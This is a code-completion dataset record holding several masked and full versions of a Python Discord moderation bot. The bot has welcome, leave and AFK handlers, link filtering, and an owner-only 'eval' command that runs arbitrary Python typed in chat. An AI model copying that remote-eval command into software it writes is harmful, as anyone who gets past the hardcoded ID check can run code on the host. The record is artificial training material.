'ctx': ctx,
'__import__': __import__
}
exec(compile(parsed, filename="<ast>", mode="exec"), env)
result = (await eval(f"{fn_name}()", env))
await ctx.send(result)
# LABEL: Debugging Commands
@bot.command(name="data")
async def data(ctx):
is_owner = await bot.is_owner(ctx.author)
if is_owner or ctx.author.id == 733532987794128897: # for real sparta
data_file = discord.File("data.json")
await ctx.send(file=data_file)
@bot.event
async def on_message(message: discord.Message):
global previous_msg_sender_id
if message.author.bot:
return
author: discord.Member = message.author
channel: discord.TextChannel = message.channel
guild: discord.Guild = message.guild
# print(str(author), ": ", message.content)
await bot.process_commands(message)
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
if message.content.replace('!', '') == bot.user.mention:
pre = data["prefix"]
await channel.send(f"The prefix in this server is `{pre}`")
for afk_user_entry in data["afks"]:
afk_user_id = int(afk_user_entry["user"])
afk_reason = afk_user_entry["reason"]
afk_user = guild.get_member(afk_user_id)
if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:
Data.server_data[str(guild.id)]["afks"].remove(afk_user_entry)
await channel.send(f"**{afk_user}** is no longer AFK.")
elif afk_user in message.mentions:
await channel.send(f"**{afk_user}** is currently AFK because **{afk_reason}**.")
if data["pay_respects"] and message.content.strip().lower() == "f":
await channel.send(f"**{author.display_name}** has paid their respects...")
if data["active"] and str(author.id) not in data["users"]:
if not str(channel.id) in data["channels"]:
perms = author.permissions_in(channel)
if not perms.administrator:
if "http://" in message.content or "https://" in message.content:
if len(data["urls"]) > 0:
for url in data["urls"]:
if not url in message.content:
await channel.purge(limit=1)
msg1 = await channel.send(f"{author.mention}, you are not allowed to send links in this channel.")
await asyncio.sleep(2)
await msg1.delete()
else:
await channel.purge(limit=1)
msg2 = await channel.send(f"{author.mention}, you are not allowed to send links in this channel.")
await asyncio.sleep(3)
await msg2.delete()
elif len(message.attachments) > 0:
await channel.purge(limit=1)
msg3 = await channel.send(f"{author.mention}, you are not allowed to send attachments in this channel.")
await asyncio.sleep(3)
await msg3.delete()
previous_msg_sender_id = author.id
bot.run(TOKEN)
|
flexible
|
{
"blob_id": "4f9729e396e01cb3d6c9011f79a1ebe618a8e762",
"index": 7787,
"step-1": "<mask token>\n\n\ndef insert_returns(body):\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_prefix(client, message):\n if str(message.guild.id) not in Data.server_data:\n Data.server_data[str(message.guild.id)] = Data.create_new_data()\n data = Data.server_data[str(message.guild.id)]\n return data['prefix']\n\n\n<mask token>\nbot.add_cog(Miscellaneous(bot, THEME_COLOR))\nbot.add_cog(ServerSettings(bot, THEME_COLOR))\nbot.add_cog(Moderator(bot, THEME_COLOR))\nbot.add_cog(AutoMod(bot, THEME_COLOR))\nbot.add_cog(Fun(bot, THEME_COLOR))\nbot.add_cog(Google(bot, THEME_COLOR))\n<mask token>\n\n\n@bot.event\nasync def on_ready():\n bot.loop.create_task(Data.auto_update_data())\n bot.loop.create_task(update_presence(bot, PREFIX))\n print('Bot is ready...')\n\n\n@bot.event\nasync def on_guild_join(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Joined - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}'\n )\n\n\n@bot.event\nasync def on_guild_remove(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Left - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}')\n\n\n@bot.event\nasync def on_member_join(member):\n guild: discord.Guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has joined {guild} server...')\n join_role = guild.get_role(data['join_role'])\n if join_role is not None:\n await member.add_roles(join_role)\n if data['welcome_msg'] is None:\n server_wlcm_msg = (\n f'Welcome, {member.mention}, to the Official **{guild.name}** Server'\n )\n else:\n server_wlcm_msg = data['welcome_msg']\n server_wlcm_msg = server_wlcm_msg.replace('[mention]',\n f'{member.mention}')\n wel_channel = None\n if data['welcome_channel'] is None:\n for channel in channels:\n if str(channel).find('welcome') != -1:\n wel_channel = channel\n break\n else:\n wel_channel = guild.get_channel(int(data['welcome_channel']))\n try:\n await wel_channel.send(server_wlcm_msg)\n except AttributeError:\n print('DEBUG: No welcome channel has been set or found.')\n\n\n@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel\n await ctx.send(\"This server's welcome channel has been removed\")\n\n\n@bot.event\nasync def on_member_remove(member):\n guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has left the {guild.name}...')\n if data['leave_msg'] is None:\n server_leave_msg = (\n f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'\n )\n else:\n server_leave_msg = data['leave_msg']\n server_leave_msg = server_leave_msg.replace('[member]', f'{member}')\n lv_channel = None\n if data['leave_channel'] is None:\n for channel in channels:\n if str(channel).find('bye') != -1 or str(channel).find('leave'\n ) != -1:\n lv_channel = channel\n break\n else:\n lv_channel = guild.get_channel(int(data['leave_channel']))\n try:\n await lv_channel.send(server_leave_msg)\n except AttributeError:\n print('DEBUG: No leave channel has been set or found.')\n\n\n@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel\n await ctx.send(\"This server's leave channel has been Removed\")\n\n\n@bot.event\nasync def on_command_error(ctx, error):\n try:\n error = error.original\n except Exception:\n pass\n if type(error) is discord.ext.commands.errors.CommandNotFound:\n return\n elif type(error) is discord.ext.commands.errors.BadArgument:\n pass\n elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:\n pass\n elif type(error) is discord.ext.commands.errors.NoPrivateMessage:\n pass\n elif type(error) is discord.ext.commands.errors.MissingPermissions:\n pass\n elif type(error) is discord.ext.commands.errors.NotOwner:\n pass\n elif type(error) is discord.ext.commands.errors.CommandOnCooldown:\n pass\n elif type(error) is discord.ext.commands.errors.ChannelNotFound:\n pass\n elif type(error) is discord.ext.commands.errors.BadUnionArgument:\n pass\n elif type(error) is discord.ext.commands.errors.BotMissingPermissions:\n pass\n elif type(error) is discord.errors.Forbidden:\n error = \"I don't have permission to do that!\"\n else:\n print(f'Error {type(error)}: {error}')\n traceback.print_exception(type(error), error, error.__traceback__,\n file=sys.stderr)\n embed = discord.Embed(title='Error!', description=\n 'An unexpected error ocurred. Please report this to the dev.'\n )\n embed.add_field(name='Error Message:', value=\n f'{type(error)}:\\n{error}', inline=False)\n await ctx.send(f'{error}')\n\n\ndef insert_returns(body):\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\n@bot.command(name='eval')\nasync def eval_fn(ctx, *, cmd):\n \"\"\"Evaluates input.\n Input is interpreted as newline seperated statements.\n If the last statement is an expression, that is the return value.\n Usable globals:\n - `bot`: the bot instance\n - `discord`: the discord module\n - `commands`: the discord.ext.commands module\n - `ctx`: the invokation context\n - `__import__`: the builtin `__import__` function\n Such that `>eval 1 + 1` gives `2` as the result.\n The following invokation will cause the bot to send the text '9'\n to the channel of invokation and return '3' as the result of evaluating\n >eval ```\n a = 1 + 2\n b = a * 2\n await ctx.send(a + b)\n a\n ```\n \"\"\"\n if ctx.message.author.id not in [400857098121904149, 733532987794128897]:\n await ctx.send('You are not authorized to run this command')\n return\n fn_name = '_eval_expr'\n cmd = cmd.strip('` ')\n cmd = '\\n'.join(f' {i}' for i in cmd.splitlines())\n body = f'async def {fn_name}():\\n{cmd}'\n parsed = ast.parse(body)\n body = parsed.body[0].body\n insert_returns(body)\n env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':\n ctx, '__import__': __import__}\n exec(compile(parsed, filename='<ast>', mode='exec'), env)\n result = await eval(f'{fn_name}()', env)\n await ctx.send(result)\n\n\n@bot.command(name='data')\nasync def data(ctx):\n is_owner = await bot.is_owner(ctx.author)\n if is_owner or ctx.author.id == 733532987794128897:\n data_file = discord.File('data.json')\n await ctx.send(file=data_file)\n\n\n@bot.event\nasync def on_message(message: discord.Message):\n global previous_msg_sender_id\n if message.author.bot:\n return\n author: discord.Member = message.author\n channel: discord.TextChannel = message.channel\n guild: discord.Guild = message.guild\n await bot.process_commands(message)\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n if message.content.replace('!', '') == bot.user.mention:\n pre = data['prefix']\n await channel.send(f'The prefix in this server is `{pre}`')\n for afk_user_entry in data['afks']:\n afk_user_id = int(afk_user_entry['user'])\n afk_reason = afk_user_entry['reason']\n afk_user = guild.get_member(afk_user_id)\n if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:\n Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)\n await channel.send(f'**{afk_user}** is no longer AFK.')\n elif afk_user in message.mentions:\n await channel.send(\n f'**{afk_user}** is currently AFK because **{afk_reason}**.')\n if data['pay_respects'] and message.content.strip().lower() == 'f':\n await channel.send(\n f'**{author.display_name}** has paid their respects...')\n if data['active'] and str(author.id) not in data['users']:\n if not str(channel.id) in data['channels']:\n perms = author.permissions_in(channel)\n if not perms.administrator:\n if ('http://' in message.content or 'https://' in message.\n content):\n if len(data['urls']) > 0:\n for url in data['urls']:\n if not url in message.content:\n await channel.purge(limit=1)\n msg1 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(2)\n await msg1.delete()\n else:\n await channel.purge(limit=1)\n msg2 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(3)\n await msg2.delete()\n elif len(message.attachments) > 0:\n await channel.purge(limit=1)\n msg3 = await channel.send(\n f'{author.mention}, you are not allowed to send attachments in this channel.'\n )\n await asyncio.sleep(3)\n await msg3.delete()\n previous_msg_sender_id = author.id\n\n\nbot.run(TOKEN)\n",
"step-3": "<mask token>\nTOKEN = os.getenv('SPARTA_TOKEN')\nintents = discord.Intents.default()\nintents.members = True\n\n\ndef get_prefix(client, message):\n if str(message.guild.id) not in Data.server_data:\n Data.server_data[str(message.guild.id)] = Data.create_new_data()\n data = Data.server_data[str(message.guild.id)]\n return data['prefix']\n\n\nPREFIX = get_prefix\nbot = commands.Bot(command_prefix=PREFIX, description=\n 'I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.',\n intents=intents, help_command=None, case_insensitive=True)\nTHEME_COLOR = discord.Colour.blue()\nbot.add_cog(Miscellaneous(bot, THEME_COLOR))\nbot.add_cog(ServerSettings(bot, THEME_COLOR))\nbot.add_cog(Moderator(bot, THEME_COLOR))\nbot.add_cog(AutoMod(bot, THEME_COLOR))\nbot.add_cog(Fun(bot, THEME_COLOR))\nbot.add_cog(Google(bot, THEME_COLOR))\nprevious_msg_sender_id = None\n\n\n@bot.event\nasync def on_ready():\n bot.loop.create_task(Data.auto_update_data())\n bot.loop.create_task(update_presence(bot, PREFIX))\n print('Bot is ready...')\n\n\n@bot.event\nasync def on_guild_join(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Joined - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}'\n )\n\n\n@bot.event\nasync def on_guild_remove(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Left - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}')\n\n\n@bot.event\nasync def on_member_join(member):\n guild: discord.Guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has joined {guild} server...')\n join_role = guild.get_role(data['join_role'])\n if join_role is not None:\n await member.add_roles(join_role)\n if data['welcome_msg'] is None:\n server_wlcm_msg = (\n f'Welcome, {member.mention}, to the Official **{guild.name}** Server'\n )\n else:\n server_wlcm_msg = data['welcome_msg']\n server_wlcm_msg = server_wlcm_msg.replace('[mention]',\n f'{member.mention}')\n wel_channel = None\n if data['welcome_channel'] is None:\n for channel in channels:\n if str(channel).find('welcome') != -1:\n wel_channel = channel\n break\n else:\n wel_channel = guild.get_channel(int(data['welcome_channel']))\n try:\n await wel_channel.send(server_wlcm_msg)\n except AttributeError:\n print('DEBUG: No welcome channel has been set or found.')\n\n\n@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel\n await ctx.send(\"This server's welcome channel has been removed\")\n\n\n@bot.event\nasync def on_member_remove(member):\n guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has left the {guild.name}...')\n if data['leave_msg'] is None:\n server_leave_msg = (\n f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'\n )\n else:\n server_leave_msg = data['leave_msg']\n server_leave_msg = server_leave_msg.replace('[member]', f'{member}')\n lv_channel = None\n if data['leave_channel'] is None:\n for channel in channels:\n if str(channel).find('bye') != -1 or str(channel).find('leave'\n ) != -1:\n lv_channel = channel\n break\n else:\n lv_channel = guild.get_channel(int(data['leave_channel']))\n try:\n await lv_channel.send(server_leave_msg)\n except AttributeError:\n print('DEBUG: No leave channel has been set or found.')\n\n\n@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel\n await ctx.send(\"This server's leave channel has been Removed\")\n\n\n@bot.event\nasync def on_command_error(ctx, error):\n try:\n error = error.original\n except Exception:\n pass\n if type(error) is discord.ext.commands.errors.CommandNotFound:\n return\n elif type(error) is discord.ext.commands.errors.BadArgument:\n pass\n elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:\n pass\n elif type(error) is discord.ext.commands.errors.NoPrivateMessage:\n pass\n elif type(error) is discord.ext.commands.errors.MissingPermissions:\n pass\n elif type(error) is discord.ext.commands.errors.NotOwner:\n pass\n elif type(error) is discord.ext.commands.errors.CommandOnCooldown:\n pass\n elif type(error) is discord.ext.commands.errors.ChannelNotFound:\n pass\n elif type(error) is discord.ext.commands.errors.BadUnionArgument:\n pass\n elif type(error) is discord.ext.commands.errors.BotMissingPermissions:\n pass\n elif type(error) is discord.errors.Forbidden:\n error = \"I don't have permission to do that!\"\n else:\n print(f'Error {type(error)}: {error}')\n traceback.print_exception(type(error), error, error.__traceback__,\n file=sys.stderr)\n embed = discord.Embed(title='Error!', description=\n 'An unexpected error ocurred. Please report this to the dev.'\n )\n embed.add_field(name='Error Message:', value=\n f'{type(error)}:\\n{error}', inline=False)\n await ctx.send(f'{error}')\n\n\ndef insert_returns(body):\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\n@bot.command(name='eval')\nasync def eval_fn(ctx, *, cmd):\n \"\"\"Evaluates input.\n Input is interpreted as newline seperated statements.\n If the last statement is an expression, that is the return value.\n Usable globals:\n - `bot`: the bot instance\n - `discord`: the discord module\n - `commands`: the discord.ext.commands module\n - `ctx`: the invokation context\n - `__import__`: the builtin `__import__` function\n Such that `>eval 1 + 1` gives `2` as the result.\n The following invokation will cause the bot to send the text '9'\n to the channel of invokation and return '3' as the result of evaluating\n >eval ```\n a = 1 + 2\n b = a * 2\n await ctx.send(a + b)\n a\n ```\n \"\"\"\n if ctx.message.author.id not in [400857098121904149, 733532987794128897]:\n await ctx.send('You are not authorized to run this command')\n return\n fn_name = '_eval_expr'\n cmd = cmd.strip('` ')\n cmd = '\\n'.join(f' {i}' for i in cmd.splitlines())\n body = f'async def {fn_name}():\\n{cmd}'\n parsed = ast.parse(body)\n body = parsed.body[0].body\n insert_returns(body)\n env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':\n ctx, '__import__': __import__}\n exec(compile(parsed, filename='<ast>', mode='exec'), env)\n result = await eval(f'{fn_name}()', env)\n await ctx.send(result)\n\n\n@bot.command(name='data')\nasync def data(ctx):\n is_owner = await bot.is_owner(ctx.author)\n if is_owner or ctx.author.id == 733532987794128897:\n data_file = discord.File('data.json')\n await ctx.send(file=data_file)\n\n\n@bot.event\nasync def on_message(message: discord.Message):\n global previous_msg_sender_id\n if message.author.bot:\n return\n author: discord.Member = message.author\n channel: discord.TextChannel = message.channel\n guild: discord.Guild = message.guild\n await bot.process_commands(message)\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n if message.content.replace('!', '') == bot.user.mention:\n pre = data['prefix']\n await channel.send(f'The prefix in this server is `{pre}`')\n for afk_user_entry in data['afks']:\n afk_user_id = int(afk_user_entry['user'])\n afk_reason = afk_user_entry['reason']\n afk_user = guild.get_member(afk_user_id)\n if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:\n Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)\n await channel.send(f'**{afk_user}** is no longer AFK.')\n elif afk_user in message.mentions:\n await channel.send(\n f'**{afk_user}** is currently AFK because **{afk_reason}**.')\n if data['pay_respects'] and message.content.strip().lower() == 'f':\n await channel.send(\n f'**{author.display_name}** has paid their respects...')\n if data['active'] and str(author.id) not in data['users']:\n if not str(channel.id) in data['channels']:\n perms = author.permissions_in(channel)\n if not perms.administrator:\n if ('http://' in message.content or 'https://' in message.\n content):\n if len(data['urls']) > 0:\n for url in data['urls']:\n if not url in message.content:\n await channel.purge(limit=1)\n msg1 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(2)\n await msg1.delete()\n else:\n await channel.purge(limit=1)\n msg2 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(3)\n await msg2.delete()\n elif len(message.attachments) > 0:\n await channel.purge(limit=1)\n msg3 = await channel.send(\n f'{author.mention}, you are not allowed to send attachments in this channel.'\n )\n await asyncio.sleep(3)\n await msg3.delete()\n previous_msg_sender_id = author.id\n\n\nbot.run(TOKEN)\n",
"step-4": "import os\nimport subprocess\nimport discord\nimport asyncio\nimport traceback\nimport sys\nimport ast\nfrom discord.ext import commands\nfrom cogs.misc import Miscellaneous\nfrom cogs.serversettings import ServerSettings\nfrom cogs.mod import Moderator\nfrom cogs.automod import AutoMod\nfrom cogs.google import Google\nfrom cogs.fun import Fun\nfrom otherscipts.helpers import update_presence\nfrom otherscipts.data import Data\nTOKEN = os.getenv('SPARTA_TOKEN')\nintents = discord.Intents.default()\nintents.members = True\n\n\ndef get_prefix(client, message):\n if str(message.guild.id) not in Data.server_data:\n Data.server_data[str(message.guild.id)] = Data.create_new_data()\n data = Data.server_data[str(message.guild.id)]\n return data['prefix']\n\n\nPREFIX = get_prefix\nbot = commands.Bot(command_prefix=PREFIX, description=\n 'I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.',\n intents=intents, help_command=None, case_insensitive=True)\nTHEME_COLOR = discord.Colour.blue()\nbot.add_cog(Miscellaneous(bot, THEME_COLOR))\nbot.add_cog(ServerSettings(bot, THEME_COLOR))\nbot.add_cog(Moderator(bot, THEME_COLOR))\nbot.add_cog(AutoMod(bot, THEME_COLOR))\nbot.add_cog(Fun(bot, THEME_COLOR))\nbot.add_cog(Google(bot, THEME_COLOR))\nprevious_msg_sender_id = None\n\n\n@bot.event\nasync def on_ready():\n bot.loop.create_task(Data.auto_update_data())\n bot.loop.create_task(update_presence(bot, PREFIX))\n print('Bot is ready...')\n\n\n@bot.event\nasync def on_guild_join(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Joined - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}'\n )\n\n\n@bot.event\nasync def on_guild_remove(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Left - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}')\n\n\n@bot.event\nasync def on_member_join(member):\n guild: discord.Guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has joined {guild} server...')\n join_role = guild.get_role(data['join_role'])\n if join_role is not None:\n await member.add_roles(join_role)\n if data['welcome_msg'] is None:\n server_wlcm_msg = (\n f'Welcome, {member.mention}, to the Official **{guild.name}** Server'\n )\n else:\n server_wlcm_msg = data['welcome_msg']\n server_wlcm_msg = server_wlcm_msg.replace('[mention]',\n f'{member.mention}')\n wel_channel = None\n if data['welcome_channel'] is None:\n for channel in channels:\n if str(channel).find('welcome') != -1:\n wel_channel = channel\n break\n else:\n wel_channel = guild.get_channel(int(data['welcome_channel']))\n try:\n await wel_channel.send(server_wlcm_msg)\n except AttributeError:\n print('DEBUG: No welcome channel has been set or found.')\n\n\n@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel\n await ctx.send(\"This server's welcome channel has been removed\")\n\n\n@bot.event\nasync def on_member_remove(member):\n guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has left the {guild.name}...')\n if data['leave_msg'] is None:\n server_leave_msg = (\n f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'\n )\n else:\n server_leave_msg = data['leave_msg']\n server_leave_msg = server_leave_msg.replace('[member]', f'{member}')\n lv_channel = None\n if data['leave_channel'] is None:\n for channel in channels:\n if str(channel).find('bye') != -1 or str(channel).find('leave'\n ) != -1:\n lv_channel = channel\n break\n else:\n lv_channel = guild.get_channel(int(data['leave_channel']))\n try:\n await lv_channel.send(server_leave_msg)\n except AttributeError:\n print('DEBUG: No leave channel has been set or found.')\n\n\n@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel\n await ctx.send(\"This server's leave channel has been Removed\")\n\n\n@bot.event\nasync def on_command_error(ctx, error):\n try:\n error = error.original\n except Exception:\n pass\n if type(error) is discord.ext.commands.errors.CommandNotFound:\n return\n elif type(error) is discord.ext.commands.errors.BadArgument:\n pass\n elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:\n pass\n elif type(error) is discord.ext.commands.errors.NoPrivateMessage:\n pass\n elif type(error) is discord.ext.commands.errors.MissingPermissions:\n pass\n elif type(error) is discord.ext.commands.errors.NotOwner:\n pass\n elif type(error) is discord.ext.commands.errors.CommandOnCooldown:\n pass\n elif type(error) is discord.ext.commands.errors.ChannelNotFound:\n pass\n elif type(error) is discord.ext.commands.errors.BadUnionArgument:\n pass\n elif type(error) is discord.ext.commands.errors.BotMissingPermissions:\n pass\n elif type(error) is discord.errors.Forbidden:\n error = \"I don't have permission to do that!\"\n else:\n print(f'Error {type(error)}: {error}')\n traceback.print_exception(type(error), error, error.__traceback__,\n file=sys.stderr)\n embed = discord.Embed(title='Error!', description=\n 'An unexpected error ocurred. Please report this to the dev.'\n )\n embed.add_field(name='Error Message:', value=\n f'{type(error)}:\\n{error}', inline=False)\n await ctx.send(f'{error}')\n\n\ndef insert_returns(body):\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\n@bot.command(name='eval')\nasync def eval_fn(ctx, *, cmd):\n \"\"\"Evaluates input.\n Input is interpreted as newline seperated statements.\n If the last statement is an expression, that is the return value.\n Usable globals:\n - `bot`: the bot instance\n - `discord`: the discord module\n - `commands`: the discord.ext.commands module\n - `ctx`: the invokation context\n - `__import__`: the builtin `__import__` function\n Such that `>eval 1 + 1` gives `2` as the result.\n The following invokation will cause the bot to send the text '9'\n to the channel of invokation and return '3' as the result of evaluating\n >eval ```\n a = 1 + 2\n b = a * 2\n await ctx.send(a + b)\n a\n ```\n \"\"\"\n if ctx.message.author.id not in [400857098121904149, 733532987794128897]:\n await ctx.send('You are not authorized to run this command')\n return\n fn_name = '_eval_expr'\n cmd = cmd.strip('` ')\n cmd = '\\n'.join(f' {i}' for i in cmd.splitlines())\n body = f'async def {fn_name}():\\n{cmd}'\n parsed = ast.parse(body)\n body = parsed.body[0].body\n insert_returns(body)\n env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':\n ctx, '__import__': __import__}\n exec(compile(parsed, filename='<ast>', mode='exec'), env)\n result = await eval(f'{fn_name}()', env)\n await ctx.send(result)\n\n\n@bot.command(name='data')\nasync def data(ctx):\n is_owner = await bot.is_owner(ctx.author)\n if is_owner or ctx.author.id == 733532987794128897:\n data_file = discord.File('data.json')\n await ctx.send(file=data_file)\n\n\n@bot.event\nasync def on_message(message: discord.Message):\n global previous_msg_sender_id\n if message.author.bot:\n return\n author: discord.Member = message.author\n channel: discord.TextChannel = message.channel\n guild: discord.Guild = message.guild\n await bot.process_commands(message)\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n if message.content.replace('!', '') == bot.user.mention:\n pre = data['prefix']\n await channel.send(f'The prefix in this server is `{pre}`')\n for afk_user_entry in data['afks']:\n afk_user_id = int(afk_user_entry['user'])\n afk_reason = afk_user_entry['reason']\n afk_user = guild.get_member(afk_user_id)\n if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:\n Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)\n await channel.send(f'**{afk_user}** is no longer AFK.')\n elif afk_user in message.mentions:\n await channel.send(\n f'**{afk_user}** is currently AFK because **{afk_reason}**.')\n if data['pay_respects'] and message.content.strip().lower() == 'f':\n await channel.send(\n f'**{author.display_name}** has paid their respects...')\n if data['active'] and str(author.id) not in data['users']:\n if not str(channel.id) in data['channels']:\n perms = author.permissions_in(channel)\n if not perms.administrator:\n if ('http://' in message.content or 'https://' in message.\n content):\n if len(data['urls']) > 0:\n for url in data['urls']:\n if not url in message.content:\n await channel.purge(limit=1)\n msg1 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(2)\n await msg1.delete()\n else:\n await channel.purge(limit=1)\n msg2 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(3)\n await msg2.delete()\n elif len(message.attachments) > 0:\n await channel.purge(limit=1)\n msg3 = await channel.send(\n f'{author.mention}, you are not allowed to send attachments in this channel.'\n )\n await asyncio.sleep(3)\n await msg3.delete()\n previous_msg_sender_id = author.id\n\n\nbot.run(TOKEN)\n",
"step-5": "import os\nimport subprocess\nimport discord\nimport asyncio\nimport traceback\nimport sys\nimport ast\n\nfrom discord.ext import commands\n\n# Import Cogs\nfrom cogs.misc import Miscellaneous\nfrom cogs.serversettings import ServerSettings\nfrom cogs.mod import Moderator\nfrom cogs.automod import AutoMod\nfrom cogs.google import Google\n\n# Minigame/Fun Cogs\nfrom cogs.fun import Fun\n#from cogs.hangman import Hangman\n#from cogs.rps import RockPaperScissors\n\nfrom otherscipts.helpers import update_presence\nfrom otherscipts.data import Data\n\nTOKEN = os.getenv('SPARTA_TOKEN')\n\nintents = discord.Intents.default()\nintents.members = True\n\n\ndef get_prefix(client, message):\n if str(message.guild.id) not in Data.server_data:\n Data.server_data[str(message.guild.id)] = Data.create_new_data()\n\n data = Data.server_data[str(message.guild.id)]\n return data[\"prefix\"]\n\n\nPREFIX = get_prefix\nbot = commands.Bot(\n command_prefix=PREFIX,\n description=\"I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.\",\n 